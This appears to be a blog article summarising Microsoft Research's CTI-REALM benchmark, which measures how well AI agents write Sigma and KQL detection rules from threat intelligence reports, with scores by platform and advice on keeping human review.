The promise of AI-assisted cybersecurity has long been hampered by a fundamental measurement problem: how do organizations validate whether an AI agent can actually perform the complex, multi-step work that security analysts do every day? Traditional benchmarks test whether models can recall MITRE ATT&CK techniques or classify threat actor tactics, but they miss the harder question—can an agent translate raw threat intelligence into production-ready detection rules that find real attacks?microsoft
Microsoft Research has addressed this gap with CTI-REALM (Cyber Threat Intelligence Real World Evaluation and LLM Benchmarking), an open-source benchmark that evaluates AI agents on end-to-end detection engineering workflows. Released in March 2026, CTI-REALM measures whether agents can read threat intelligence reports, explore telemetry schemas, iteratively refine KQL queries, and produce validated Sigma rules and KQL detection logic—exactly the workflow security analysts follow when building detections for platforms like Microsoft Sentinel.microsoft
Why Traditional Benchmarks Fall Short
Existing cybersecurity AI benchmarks primarily test parametric knowledge—can a model name the technique behind a log entry, or correctly label a tactic from a threat report? While useful, these assessments evaluate isolated skills rather than the operational capability security teams actually need: translating narrative threat intelligence into working detection logic that identifies attacks in production environments.microsoft
CTI-REALM fills this gap by measuring three critical dimensions that earlier benchmarks overlook:microsoft
- Operationalization over recall: Agents must produce working Sigma rules and KQL queries validated against real attack telemetry, not just answer multiple-choice questions about threat actors.
- Complete workflow evaluation: The benchmark scores intermediate decision quality—CTI report selection, MITRE technique mapping, data source identification, and iterative query refinement—not just final output.
- Realistic tooling: Agents use the same tools security analysts rely on: CTI repositories, schema explorers, Kusto query engines, and MITRE ATT&CK databases.
This granular, checkpoint-based scoring reveals precisely where AI agents struggle in the detection pipeline, helping security leaders understand whether performance gaps stem from comprehension failures, query construction issues, or detection specificity problems.microsoft
The Benchmark: Real Threat Intelligence, Real Azure Environments
Microsoft curated 37 CTI reports from public sources including Microsoft Security, Datadog Security Labs, Palo Alto Networks, and Splunk, selecting scenarios that could be faithfully simulated in sandboxed environments with telemetry suitable for detection development.microsoft
The benchmark spans three Azure-relevant platforms:
- Linux endpoints: Traditional host-based detection scenarios
- Azure Kubernetes Service (AKS): Container and orchestration layer attacks
- Azure cloud infrastructure: Multi-source, APT-style attack chains requiring correlation across identity, resource, and network logs
Ground-truth scoring validates detection rules at every workflow stage, from technique identification through final KQL query accuracy.microsoft
Key Findings: What Works, What Doesn't
Microsoft evaluated multiple frontier AI models on CTI-REALM-50, a subset spanning all three platforms. The results reveal both promise and clear limitations:microsoft
Performance drops sharply across platform complexity: Linux endpoint detections scored 0.585, AKS scenarios dropped to 0.517, and Azure cloud infrastructure plummeted to 0.282. This reflects the reality that multi-source correlation across identity logs, Azure Activity, and resource-specific telemetry remains exceptionally difficult for AI agents—precisely the scenario SOC teams working in Microsoft Sentinel face when investigating sophisticated, multi-stage cloud attacks.microsoft
More reasoning isn't always better: Within model families, medium reasoning configurations consistently outperformed high reasoning modes, suggesting that overthinking hurts performance in tool-rich, iterative agentic environments.microsoft
Structured guidance closes performance gaps: Providing smaller models with human-authored workflow guidance improved threat technique identification and closed approximately one-third of the performance gap to much larger models.microsoft
What This Means for Azure Security Operations
For security architects and SOC teams working with Microsoft Sentinel, CTI-REALM's findings have immediate practical implications:
| Traditional Detection Engineering | AI-Assisted Detection Engineering |
|---|---|
| Analyst reads threat report manually | AI agent parses CTI report and extracts techniques |
| Analyst identifies relevant MITRE techniques | Agent maps techniques to data sources automatically |
| Analyst explores schema, writes KQL queries | Agent iterates on KQL queries using schema tools |
| Analyst validates detection against test data | Agent generates Sigma rule + KQL validated against telemetry |
| Process takes hours to days per report | Process completes in minutes with human validation |
The benchmark demonstrates that AI agents can meaningfully accelerate detection development, particularly for Linux and AKS scenarios where success rates exceed 50%. However, the 28% success rate for Azure cloud infrastructure detections underscores a critical reality: human expertise remains essential for validating complex, multi-source detections before operational deployment.microsoft+1
Security teams should view AI agents as analyst augmentation tools rather than replacements. The checkpoint-based scoring in CTI-REALM helps organizations identify where human review is most critical—typically in cloud correlation logic, detection specificity tuning, and false positive reduction.
Responsible Adoption: Human-in-the-Loop Remains Non-Negotiable
Microsoft's research reinforces that AI-generated detection rules require validation before production use. Organizations adopting AI-assisted detection workflows should implement structured governance:microsoft
- Validate AI-generated KQL queries against test datasets before enabling in Sentinel analytics rules
- Require peer review for detections targeting cloud infrastructure, where AI performance is weakest
- Benchmark models using CTI-REALM before considering downstream operational use
- Maintain detection metadata tracking whether rules originated from AI or human analysts to support incident response context
The benchmark's open-source availability on the Inspect AI repository enables security teams to test models against their own operational requirements before adoption.microsoft
The Path Forward
CTI-REALM represents a foundational shift in how the security industry evaluates AI capabilities—moving from knowledge recall to operational competence. For Azure practitioners, this matters because the benchmark's platforms (Linux, AKS, Azure cloud) and output formats (Sigma rules, KQL queries) directly mirror working with Microsoft Sentinel's analytics engine.microsoft
As Microsoft continues integrating AI capabilities into Security Copilot and the broader unified SIEM+XDR vision, benchmarks like CTI-REALM provide the measurement framework security leaders need to adopt AI responsibly—understanding both capabilities and limitations before operationalizing agent-assisted workflows.
The benchmark is freely available to model developers and security teams. Organizations interested in contributing, benchmarking, or exploring partnership opportunities can access the repository and contact Microsoft Research at msecaimrbenchmarking@microsoft.com.microsoft
About the Research: CTI-REALM was developed by Microsoft Research and announced March 20, 2026. The full technical paper is available at CTI-REALM: A new benchmark for end-to-end detection rule generation with AI agents | Microsoft Security Blog